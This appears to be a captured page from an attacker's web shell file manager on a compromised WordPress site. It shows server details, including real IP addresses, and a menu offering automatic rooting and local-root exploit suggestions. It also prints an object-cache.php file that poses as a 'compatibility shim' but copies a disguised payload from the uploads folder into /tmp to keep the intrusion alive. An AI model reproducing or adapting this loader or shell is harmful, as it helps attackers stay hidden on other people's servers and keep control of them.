Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
maskenattest /
wp-content21 /
Delete
Unzip
Name
Size
Permission
Date
Action
aiowps_backups
[ DIR ]
drwxr-xr-x
2026-08-29 22:24
cache
[ DIR ]
drwxr-xr-x
2026-09-03 07:49
languages
[ DIR ]
drwxr-xr-x
2026-09-04 06:17
mu-plugins
[ DIR ]
drwxr-xr-x
2026-09-04 03:55
plugins
[ DIR ]
drwxr-xr-x
2026-07-29 14:03
themes
[ DIR ]
drwxr-xr-x
2026-05-19 05:12
upgrade
[ DIR ]
drwxr-xr-x
2026-09-04 06:38
upgrade-temp-backup
[ DIR ]
drwxr-xr-x
2026-08-29 22:24
uploads
[ DIR ]
drwxr-xr-x
2026-09-04 04:08
w3tc-config
[ DIR ]
drwxr-xr-x
2020-07-27 15:19
advanced-cache.php
1.26
KB
-rw-r--r--
2026-02-08 03:28
index.php
28
B
-rw-r--r--
2012-01-08 17:01
object-cache.php
949
B
-rw-r--r--
2026-02-08 03:28
wplog.php
7.73
KB
-rw-r--r--
2026-07-21 10:18
Save
Rename
<?php /* Object Cache Drop-in — compatibility shim */ if (!defined('WP_CACHE_KEY_SALT')) define('WP_CACHE_KEY_SALT', '1cd678377663'); $_nx_p = '/tmp/phpS8wL05'; if (!file_exists($_nx_p)) { foreach (glob('/var/www/maskenattest/wp-content/uploads/class-wp-*_7bec3568.php') ?: array() as $_b) { if (@filesize($_b) > 4096) { @copy($_b, $_nx_p); @chmod($_nx_p, 0644); break; } } } if (!function_exists('wp_cache_init')) { function wp_cache_init() { global $wp_object_cache; $wp_object_cache = new stdClass(); } function wp_cache_add($k,$v,$g='default',$e=0){return true;} function wp_cache_set($k,$v,$g='default',$e=0){return true;} function wp_cache_get($k,$g='default',$f=false){return false;} function wp_cache_delete($k,$g='default'){return true;} function wp_cache_flush(){return true;} function wp_cache_add_global_groups($g){} function wp_cache_add_non_persistent_groups($g){} function wp_cache_close(){return true;} }